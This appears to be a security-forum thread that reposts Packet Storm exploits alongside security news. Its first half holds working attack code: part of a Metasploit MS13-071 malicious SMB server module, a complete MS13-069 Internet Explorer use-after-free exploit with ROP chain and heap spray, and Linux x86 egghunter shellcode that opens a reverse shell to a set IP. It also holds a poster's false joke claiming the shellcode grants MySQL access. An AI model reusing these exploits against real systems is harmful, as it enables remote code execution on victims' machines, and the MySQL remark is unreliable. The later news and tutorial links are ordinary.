pkt['Payload']['SMB'].v['WordCount'] = 3 pkt['Payload'].v['AndX'] = 0x75 pkt['Payload'].v['Reserved1'] = 00 pkt['Payload'].v['AndXOffset'] = 96 pkt['Payload'].v['Action'] = 0x1 # Logged in as Guest pkt['Payload'].v['Payload'] = Rex::Text.to_unicode("Unix", 'utf-16be') + "\x00\x00" + # Native OS # Samba signature Rex::Text.to_unicode("Samba 3.4.7", 'utf-16be') + "\x00\x00" + # Native LAN Manager # Samba signature Rex::Text.to_unicode("WORKGROUP", 'utf-16be') + "\x00\x00\x00" + # Primary DOMAIN # Samba signature tree_connect_response = "" tree_connect_response << [7].pack("C") # Tree Connect Response : WordCount tree_connect_response << [0xff].pack("C") # Tree Connect Response : AndXCommand tree_connect_response << [0].pack("C") # Tree Connect Response : Reserved tree_connect_response << [0].pack("v") # Tree Connect Response : AndXOffset tree_connect_response << [0x1].pack("v") # Tree Connect Response : Optional Support tree_connect_response << [0xa9].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0x12].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [13].pack("v") # Tree Connect Response : ByteCount tree_connect_response << "A:\x00" # Service tree_connect_response << "#{Rex::Text.to_unicode("NTFS")}\x00\x00" # Extra byte parameters # Fix the Netbios Session Service Message Length # to have into account the tree_connect_response, # need to do this because there isn't support for # AndX still my_pkt = pkt.to_s + tree_connect_response original_length = my_pkt[2, 2].unpack("n").first original_length = original_length + tree_connect_response.length my_pkt[2, 2] = [original_length].pack("n") c.put(my_pkt) end def smb_cmd_create(c, buff) pkt = CONST::SMB_CREATE_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['Payload'] =~ /#{Rex::Text.to_unicode("#{@scr_file}\x00")}/ pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 42 pkt['Payload'].v['AndX'] = 0xff # no further commands pkt['Payload'].v['OpLock'] = 0x2 # No need to track fid here, we're just offering one file pkt['Payload'].v['FileID'] = rand(0x7fff) + 1 # To avoid fid = 0 pkt['Payload'].v['Action'] = 0x1 # The file existed and was opened pkt['Payload'].v['CreateTimeLow'] = @lo pkt['Payload'].v['CreateTimeHigh'] = @hi pkt['Payload'].v['AccessTimeLow'] = @lo pkt['Payload'].v['AccessTimeHigh'] = @hi pkt['Payload'].v['WriteTimeLow'] = @lo pkt['Payload'].v['WriteTimeHigh'] = @hi pkt['Payload'].v['ChangeTimeLow'] = @lo pkt['Payload'].v['ChangeTimeHigh'] = @hi pkt['Payload'].v['Attributes'] = 0x80 # Ordinary file pkt['Payload'].v['AllocLow'] = 0x100000 pkt['Payload'].v['AllocHigh'] = 0 pkt['Payload'].v['EOFLow'] = @exe.length pkt['Payload'].v['EOFHigh'] = 0 pkt['Payload'].v['FileType'] = 0 pkt['Payload'].v['IPCState'] = 0x7 pkt['Payload'].v['IsDirectory'] = 0 c.put(pkt.to_s) else pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 # OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_read(c, buff) pkt = CONST::SMB_READ_PKT.make_struct pkt.from_s(buff) offset = pkt['Payload'].v['Offset'] length = pkt['Payload'].v['MaxCountLow'] pkt = CONST::SMB_READ_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_READ_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 12 pkt['Payload'].v['AndX'] = 0xff # no more commands pkt['Payload'].v['Remaining'] = 0xffff pkt['Payload'].v['DataLenLow'] = length pkt['Payload'].v['DataOffset'] = 59 pkt['Payload'].v['DataLenHigh'] = 0 pkt['Payload'].v['Reserved3'] = 0 pkt['Payload'].v['Reserved4'] = 6 pkt['Payload'].v['ByteCount'] = length pkt['Payload'].v['Payload'] = @exe[offset, length] c.put(pkt.to_s) end def smb_cmd_trans(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) sub_command = pkt['Payload'].v['SetupData'].unpack("v").first case sub_command when 0x5 # QUERY_PATH_INFO smb_cmd_trans_query_path_info(c, buff) when 0x1 # FIND_FIRST2 smb_cmd_trans_find_first2(c, buff) else pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000225 # NT_STATUS_NOT_FOUND c.put(pkt.to_s) end end def smb_cmd_trans_query_path_info(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['SetupData'].length < 16 # if QUERY_PATH_INFO_PARAMETERS doesn't include a file name, # return a Directory answer pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 2 pkt['Payload'].v['DataCountTotal'] = 40 pkt['Payload'].v['ParamCount'] = 2 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 40 pkt['Payload'].v['DataOffset'] = 60 pkt['Payload'].v['Payload'] = "\x00" + # Padding # QUERY_PATH_INFO Parameters "\x00\x00" + # EA Error Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change "\x10\x00\x00\x00" + # File attributes => directory "\x00\x00\x00\x00" # Unknown c.put(pkt.to_s) else # if QUERY_PATH_INFO_PARAMETERS includes a file name, # returns an object name not found error pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 #OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_trans_find_first2(c, buff) pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) file_name = Rex::Text.to_unicode(@scr_file) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 10 pkt['Payload'].v['DataCountTotal'] = 94 + file_name.length pkt['Payload'].v['ParamCount'] = 10 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 94 + file_name.length pkt['Payload'].v['DataOffset'] = 68 pkt['Payload'].v['Payload'] = "\x00" + # Padding # FIND_FIRST2 Parameters "\xfd\xff" + # Search ID "\x01\x00" + # Search count "\x01\x00" + # End Of Search "\x00\x00" + # EA Error Offset "\x00\x00" + # Last Name Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [94 + file_name.length].pack("V") + # Next Entry Offset "\x00\x00\x00\x00" + # File Index [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change [@exe.length].pack("V") + "\x00\x00\x00\x00" + # End Of File "\x00\x00\x10\x00\x00\x00\x00\x00" + # Allocation size "\x80\x00\x00\x00" + # File attributes => directory [file_name.length].pack("V") + # File name len "\x00\x00\x00\x00" + # EA List Lenght "\x00" + # Short file lenght "\x00" + # Reserved ("\x00" * 24) + file_name c.put(pkt.to_s) end end Sursa: MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution ? Packet Storm
-
MS13-069 Microsoft Internet Explorer CCaret Use-After-Free Authored by corelanc0d3r, sinn3r | Site metasploit.com This Metasploit module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code execution under the context of the user. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'corelanc0d3r', # Vuln discovery & PoC (@corelanc0d3r) 'sinn3r' # Metasploit (@_sinn3r) ], 'References' => [ [ 'CVE', '2013-3205' ], [ 'OSVDB', '97094' ], [ 'MSB', 'MS13-069' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-217/' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ # Win 7 target on hold until we have a stable custom spray for it 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'TargetAddr' => 0x1ec20101, # Allocs @ 1ec20020 (+0xe1 bytes to be null-byte free) - in ecx 'PayloadAddr' => 0x1ec20105, # where the ROP payload begins 'Pivot' => 0x77C4FA1A, # mov esp,ebx; pop ebx; ret 'PopESP' => 0x77C37422, # pop esp; ret (pivot to a bigger space) 'Align' => 0x77c4d801 # add esp, 0x2c; ret (ROP gadget to jmp over pivot gadget) } ] ], 'Payload' => { # Our property sprays dislike null bytes 'BadChars' => "\x00", # Fix the stack again before the payload is executed. # If we don't do this, meterpreter fails due to a bad socket. 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000 # Fall back to the previous allocation so we have plenty of space # for the decoder to use 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Sep 10 2013", 'DefaultTarget' => 0)) end def get_target(agent) return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) return t end end nil end def get_payload(t) rop = [ 0x77c1e844, # POP EBP # RETN [msvcrt.dll] 0x77c1e844, # skip 4 bytes [msvcrt.dll] 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] 0xffffffff, 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] 0x77c3048a, # POP EDI # RETN [msvcrt.dll] 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] 0x77c46efb, # POP ESI # RETN [msvcrt.dll] 0x77c2aacc, # JMP [EAX] [msvcrt.dll] 0x77c3b860, # POP EAX # RETN [msvcrt.dll] 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] ].pack("V*") # This data should appear at the beginning of the target address (see TargetAddr in metadata) p = '' p << rand_text_alpha(225) # Padding to avoid null byte addr p << [t['TargetAddr']].pack("V*") # For mov ecx,dword ptr [eax] p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr) p << [t['Pivot']].pack("V*") # Stack pivot p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment p << rop # ROP chain p << payload.encoded # Actual payload return p end # # Notes: # * A custom spray is used (see function putPayload), because document.write() keeps freeing # our other sprays like js_property_spray or the heaplib + substring approach. This spray # seems unstable for Win 7, we'll have to invest more time on that. # * Object size = 0x30 # def get_html(t) js_payload_addr = ::Rex::Text.to_unescape([t['PayloadAddr']].pack("V*")) js_target_addr = ::Rex::Text.to_unescape([t['TargetAddr']].pack("V*")) js_pop_esp = ::Rex::Text.to_unescape([t['PopESP']].pack("V*")) js_payload = ::Rex::Text.to_unescape(get_payload(t)) js_rand_dword = ::Rex::Text.to_unescape(rand_text_alpha(4)) html = %Q|<!DOCTYPE html> <html> <head> <script> var freeReady = false; function getObject() { var obj = ''; for (i=0; i < 11; i++) { if (i==1) { obj += unescape("#{js_pop_esp}"); } else if (i==2) { obj += unescape("#{js_payload_addr}"); } else if (i==3) { obj += unescape("#{js_target_addr}"); } else { obj += unescape("#{js_rand_dword}"); } } obj += "\\u4545"; return obj; } function emptyAllocator(obj) { for (var i = 0; i < 40; i++) { var e = document.createElement('div'); e.className = obj; } } function spray(obj) { for (var i = 0; i < 50; i++) { var e = document.createElement('div'); e.className = obj; document.appendChild(e); } } function putPayload() { var p = unescape("#{js_payload}"); var block = unescape("#{js_rand_dword}"); while (block.length < 0x80000) block += block; block = p + block.substring(0, (0x80000-p.length-6)/2); for (var i = 0; i < 0x300; i++) { var e = document.createElement('div'); e.className = block; document.appendChild(e); } } function trigger() { if (freeReady) { var obj = getObject(); emptyAllocator(obj); document.write("#{rand_text_alpha(1)}"); spray(obj); putPayload(); } } window.onload = function() { document.body.contentEditable = 'true'; document.execCommand('InsertInputPassword'); document.body.innerHTML = '#{rand_text_alpha(1)}'; freeReady = true; } </script> </head> <body onbeforeeditfocus="trigger()"> </body> </html> | html.gsub(/^\x20\x20\x20\x20/, '') end def on_request_uri(cli, request) agent = request.headers['User-Agent'] t = get_target(agent) unless t print_error("Not a suitable target: #{agent}") send_not_found(cli) return end html = get_html(t) print_status("Sending exploit...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end end =begin In mshtml!CCaret::UpdateScreenCaret function: .text:63620F82 mov ecx, [eax] ; crash .text:63620F84 lea edx, [esp+110h+var_A4] .text:63620F88 push edx .text:63620F89 push eax .text:63620F8A call dword ptr [ecx+2Ch] =end Sursa: MS13-069 Microsoft Internet Explorer CCaret Use-After-Free ? Packet Storm
-
Linux / x86 Multi-Egghunter Shellcode Authored by Ryan Fenno This is multi-egghunter Linux/x86 shellcode. /* Title: Multi-Egghunter Author: Ryan Fenno (@ryanfenno) Date: 20 September 2013 Tested on: Linux/x86 (Ubuntu 12.0.3) Description: This entry represents an extension of skape's sigaction(2) egghunting method [1] to multiple eggs. It is similar in spirit to BJ 'SkyLined' Wever's omelet shellcode for Win32 [2]. The proof-of-concept presented here splits a reverse TCP bind shell [3] into two parts. The egghunter is not only responsible for finding the two eggs, but also for executing them in the correct order. It is readily extendable to any (reasonable) number of eggs. References: [1] skape, "Safely Searching Process Virtual Address Space", www.hick.org/code/skape/papers/egghunt-shellcode.pdf [2] Wever, Berend-Jan, "w32-SEH-omelet-shellcode", http://code.google.com/p/w32-seh-omelet-shellcode/ [3] Willis, R. "reversetcpbindshell", http://shell-storm.org/shellcode/files/shellcode-849.php */ #include <stdio.h> #define MARKER "\x93\x51\x93\x59" #define TAG1 "\x01\x51\x93\x59" // easiest to use latter three bytes #define TAG2 "\x02\x51\x93\x59" // of MARKER for latter three of TAGs // first egg/tag/shellcode #define IPADDR "\xc0\xa8\x7a\x01" // 192.168.122.1 #define PORT "\xab\xcd" // 43981 unsigned char shellcode1[] = MARKER TAG1 //SHELLCODE1 "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80" "\x96\xb0\x66\xb3\x03\x68" IPADDR "\x66\x68" PORT "\x66" "\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80" // perform the jump "\x83\xc4\x20\x5f\x83\xec\x24\xff\xe7" ; /* global _start section .text _start: xor ebx, ebx mul ebx mov al, 0x66 ; socketcall() <linux/net.h> inc ebx ; socket() push edx ; arg3 :: protocol = 0 push ebx ; arg2 :: SOCK_STREAM = 1 push byte 0x2 ; arg1 :: AF_INET = 2 mov ecx, esp int 0x80 xchg eax, esi ; save clnt_sockfd in esi mov al, 0x66 ; socketcall() mov bl, 0x3 ; connect() ; build sockaddr_in struct (srv_addr) push dword 0x017AA8C0 ; IPv4 address 192.168.122.1 in hex (little endian) push word 0x697a ; TCP port 0x7a69 = 31337 push word 0x2 ; AF_INET = 2 mov ecx, esp ; pointer to sockaddr_in struct push dword 0x10 ; arg3 :: sizeof(struct sockaddr) = 16 [32-bits] push ecx ; arg2 :: pointer to sockaddr_in struct push esi ; arg1 :: clnt_sockfd mov ecx, esp int 0x80 ;---- perform the jump ; looking at the stack at this point, the target for the jump ; is at $esp+0x20, so... add esp, 0x20 pop edi sub esp, 0x24 jmp edi */ // second egg/tag/shellcode unsigned char shellcode2[] = MARKER TAG2 //SHELLCODE2 "\x5b\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89" "\xe2\x53\x89\xe1\xcd\x80" ; /* global _start section .text _start: pop ebx ; arg1 :: clnt_sockfd push 0x2 pop ecx ; loop from 2 to 0 dup2loop: mov byte al, 0x3F ; dup2(2) int 0x80 dec ecx jns dup2loop ; loop ends when ecx == -1 xor eax, eax mov byte al, 0x0B ; execve(2) push edx ; null terminator push 0x68732f2f ; "hs//" push 0x6e69622f ; "nib/" mov ebx, esp ; arg1 :: "/bin/sh\0" push edx ; null terminator mov edx, esp ; arg3 :: envp = NULL array push ebx mov ecx, esp ; arg2 :: argv array (ptr to string) int 0x80 */ unsigned char egghunter[] = "\x6a\x02\x59\x57\x51\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43" "\x58\xcd\x80\x3c\xf2\x74\xf1\xb8" MARKER "\x89\xcf\xaf" "\x75\xec\x89\xcb\x59\x20\xc8\xaf\x51\x89\xd9\x75\xe1\x59\xe2" "\xd5\xff\xe7"; /* global _start section .text _start: push byte 0x2 pop ecx ; number of eggs eggLoop: push edi ; memory location of ecx-th piece; first of ; these is meaningless push ecx ; save counter xor ecx, ecx ; initialize ecx for memory search fillOnes: or cx, 0xfff shiftUp: inc ecx push byte 0x43 ; sigaction(2) pop eax int 0x80 cmp al, 0xf2 jz fillOnes mov eax, 0x59935193 ; marker mov edi, ecx scasd ; advances edi by 0x4 if there is a match; ; assumes direction flag (DF) is not set jnz shiftUp mov ebx, ecx ; save off ecx in case we need to keep looking pop ecx ; restore counter and al, cl ; tag in eax scasd push ecx mov ecx, ebx jnz shiftUp pop ecx loop eggLoop jmp edi */ void main() { printf("egghunter length: %d\n", sizeof(egghunter)-1); printf("shellcode1 length: %d\n", sizeof(shellcode1)-1); printf("shellcode2 length: %d\n", sizeof(shellcode2)-1); ((int(*)())egghunter)(); } Sursa: Linux / x86 Multi-Egghunter Shellcode ? Packet Storm L-am postat deoarece e bine documentat. Pentru cei care nu stiu ce e un shellcode, puteti folosi codul de mai sus pentru a obtine acces la bazele de date MySQL ale unor site-uri vulnerabile la MyShellcode Injection. ( )
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs
Nytro replied to Nytro's topic in Stiri securitate
PC disable can be triggered locally or remotely—an Internet or LAN connection is not necessary—under the following circumstances: - Excessive end-user attempts to log into the system. - The laptop misses its rendezvous time with the server (electronic check-in over the Internet), thereby issuing a local poison pill. • The IT administrator can send a poison pill remotely to the stolen laptop across the Internet, intranet, or Short Messaging Service (SMS) -
Return-Oriented-Programming Authored by Saif El-Sherei Whitepaper called Return-Oriented-Programming (ROP FTW). Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/return-oriented-programming.pdf
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs
Nytro replied to Nytro's topic in Stiri securitate
Ai dreptate, dar cum functioneaza anti-theft-ul de pe Intel-uri? E o idee, greu de demonstrat, nu trebuie sa o credem, dar trebuie sa o luam in considerare si sa ne gandim ca asa ceva, cu certitudine, e posibil. -
Off-By-One Exploitation Tutorial Authored by Saif El-Sherei This whitepaper is called Off-By-One Exploitation Tutorial. The off by one vulnerability in general means that if an attacker supplied input with certain length if the program has an incorrect length condition the program will write one byte outside the bounds of the space allocated to hold this input causing one of two scenarios depending on the input. Download: http://packetstormsecurity.com/files/download/123361/offbyone-tutorial.pdf
-
nteger overflow/underflow exploitation tutorial By Saif El Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend once said “ you think you understand something until you try to teach it “. This is my first try at writing papers. This paper is my understanding of the subject. I understand it might not be complete I am open for suggestions and modifications. I hope as this project helps others as it helped me. This paper is purely for education purposes. Note: the Exploitation methods explained in the below tutorial will not work on modern system due to NX, ASLR, and modern kernel security mechanisms. If we continue this series we will have a tutorial on bypassing some of these controls What is an integer? An integer in computing is a variable holding a real number without fractions. The size of int is depending on the architecture. So on i386 arch (32-bit) the int is 32-bits. An integer is represented in memory in binary. Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/overflowunderflow-tutorial.pdf
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs Tinfoil hat brigade say every PC is on mobile networks, even when powered down By Richard Chirgwin, 23rd September 2013 Intel has apparently turned up one of the holiest of holy grails in the tech sector, accidentally creating an zero-power-consumption on-chip 3G communications platform as an NSA backdoor. The scoop comes courtesy of tinfoil socialist site Popular Resistance, in this piece written by freelance truther Jim Stone, who has just discovered the wake-on-LAN capabilities in vPro processors. He writes: “The new Intel Core vPro processors contain a new remote access feature which allows 100 percent remote access to a PC 100 percent of the time, even if the computer is turned off. Core vPro processors contain a second physical processor embedded within the main processor which has it’s own operating system embedded on the chip itself. As long as the power supply is available and and in working condition, it can be woken up by the Core vPro processor, which runs on the system’s phantom power and is able to quietly turn individual hardware components on and access anything on them.” A little background: Popular Resistance was formed in 2011 and was part of the 'Occupy' movement, having done its bit in Washington DC. It now promotes an anti-capitalist agenda. Back to Stone, who says Intel can do all the stuff vPro enables thanks to an undocumented 3G radio buried on its chips apparently extends wake-on-LAN to wake-on-mobile: “Core vPro processors work in conjunction with Intel’s new Anti Theft 3.0, which put 3g connectivity into every Intel CPU after the Sandy Bridge version of the I3/5/7 processors. Users do not get to know about that 3g connection, but it IS there,” he writes, “anti theft 3.0 always has that 3G connection on also, even if the computer is turned off” (emphasis added). No evidence is offered for the assertions detailed above. And with that, El Reg will now happily open the floor to the commentards … ® Sursa: 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs • The Register
-
Daca tot nu aveti ce face cu 20 de euro, imi dati mie bautura de ei.
-
Researchers can slip an undetectable trojan into Intel’s Ivy Bridge CPUs New technique bakes super stealthy hardware trojans into chip silicon. by Dan Goodin - Sept 18 2013, 5:57pm GTBST Janet Lackey Scientists have developed a technique to sabotage the cryptographic capabilities included in Intel's Ivy Bridge line of microprocessors. The technique works without being detected by built-in tests or physical inspection of the chip. The proof of concept comes eight years after the US Department of Defense voiced concern that integrated circuits used in crucial military systems might be altered in ways that covertly undermined their security or reliability. The report was the starting point for research into techniques for detecting so-called hardware trojans. But until now, there has been little study into just how feasible it would be to alter the design or manufacturing process of widely used chips to equip them with secret backdoors. In a recently published research paper, scientists devised two such backdoors they said adversaries could feasibly build into processors to surreptitiously bypass cryptographic protections provided by the computer running the chips. The paper is attracting interest following recent revelations the National Security Agency is exploiting weaknesses deliberately built-in to widely used cryptographic technologies so analysts can decode vast swaths of Internet traffic that otherwise would be unreadable. The attack against the Ivy Bridge processors sabotages random number generator (RNG) instructions Intel engineers added to the processor. The exploit works by severely reducing the amount of entropy the RNG normally uses, from 128 bits to 32 bits. The hack is similar to stacking a deck of cards during a game of Bridge. Keys generated with an altered chip would be so predictable an adversary could guess them with little time or effort required. The severely weakened RNG isn't detected by any of the "Built-In Self-Tests" required for the P800-90 and FIPS 140-2 compliance certifications mandated by the National Institute of Standards and Technology. The tampering is also undetectable to the type of physical inspection that's required to ensure a chip is "golden," a term applied to integrated circuits known to not include malicious modifications. Christof Paar, one of the researchers, told Ars the proof-of-concept hardware trojan relies on a technique that requires low-level changes to only a "few dozen transistors." That represents a minuscule percentage of the more than 1 billion transistors overall. The tweaks alter the transistors' and gates' "doping polarity," a change that adds a small number of atoms of material to the silicon. Because the changes are so subtle, they don't show up in physical inspections used to certify golden chips. "We want to stress that one of the major advantages of the proposed dopant trojan is that [it] cannot be detected using optical reverse-engineering since we only modify the dopant masks," the researchers reported in their paper. "The introduced trojans are similar to the commercially deployed code-obfuscation methods which also use different dopant polarity to prevent optical reverse-engineering. This suggests that our dopant trojans are extremely stealthy as well as practically feasible." Besides being stealthy, the alterations can happen at a minimum of two points in the supply chain. That includes (1) during manufacturing, where someone makes changes to the doping, or (2) a malicious designer making changes to the layout file of an integrated circuit before it goes to manufacturing. In addition to the Ivy Bridge processor, the researchers applied the dopant technique to lodge a trojan in a chip prototype that was designed to withstand so-called side channel attacks. The result: cryptographic keys could be correctly extracted on the tampered device with a correlation close to 1. (In fairness, they found a small vulnerability in the trojan-free chip they used for comparison, but it was unaffected by the trojan they introduced.) The paper was authored by Georg T. Becker of the University of Massachusetts, Amherst; Francesco Regazzoni of TU Delft, the Netherlands and ALaRI, University of Lugano, Switzerland; Paar of UMass; Horst Gortz Institut for IT-Security, Ruhr-Universitat, Bochum, Germany; and Wayne P. Burleson of UMass. In an e-mail, Paar stressed that no hardware trojans have ever been found circulating in the real world and that the techniques devised in the paper are mere proofs of concept. Still, the demonstration suggests the covert backdoors are technically feasible. It wouldn't be surprising to see chip makers and certifications groups respond with new ways to detect these subtle changes. Sursa: Researchers can slip an undetectable trojan into Intel’s Ivy Bridge CPUs | Ars Technica
-
NSA: Snowden was just doing his job ummary: More details emerge on how Edward Snowden was able to gain access to and copy so much secret information. His job provided the perfect cover for his illegal activities. In response, the NSA is making like the TSA and fighting the last war. By Larry Seltzer for Zero Day | September 19, 2013 Interviews with two NSA officials by National Public Radio reveal a tragic irony of Edward Snowden's theft and leaking of classified documents: He was just doing his job. One of the lessons learned from the investigations of the 9/11 Commission was that there was insufficient sharing of intelligence information. In order to facilitate such sharing, the NSA created a file sharing area on the Agency's intranet site. NSA officials told NPR that all of the documents Snowden has leaked came from that sharing area. * "Unfortunately for us," one official said, "if you had a top secret SCI [sensitive compartmented information] clearance, you got access to that." Not only did Snowden have such access, but as a System Administrator it was part of his job to search through the shared area for documents which belonged in more restrictive areas and move them. From the NPR article: "It's kind of brilliant, if you're him," an official said. "His job was to do what he did. He wasn't a ghost. He wasn't that clever. He did his job. He was observed [moving documents], but it was his job." It's a little more complicated than Snowden literally doing his job, although the job was the perfect cover for his activities. The article also notes that the NSA was, at the time, allowing users access to USB ports on computers which had access to the sensitive data. They have, more recently, closed off access to those ports, which Snowden likely used to copy data from NSA systems to a USB thumb drive. Incredibly, this is the same method used by Bradley Manning long ago, but the NSA didn't react to that news. Restricting access to USB ports has been a standard feature of Windows system management for many years and there are 3rd party products that do this as well. The NSA has implemented other practices, including document tagging, to prevent what Snowden did. The tags will restrict access to the documents and track their usage. It's all another example of fighting the last war. The NSA, in 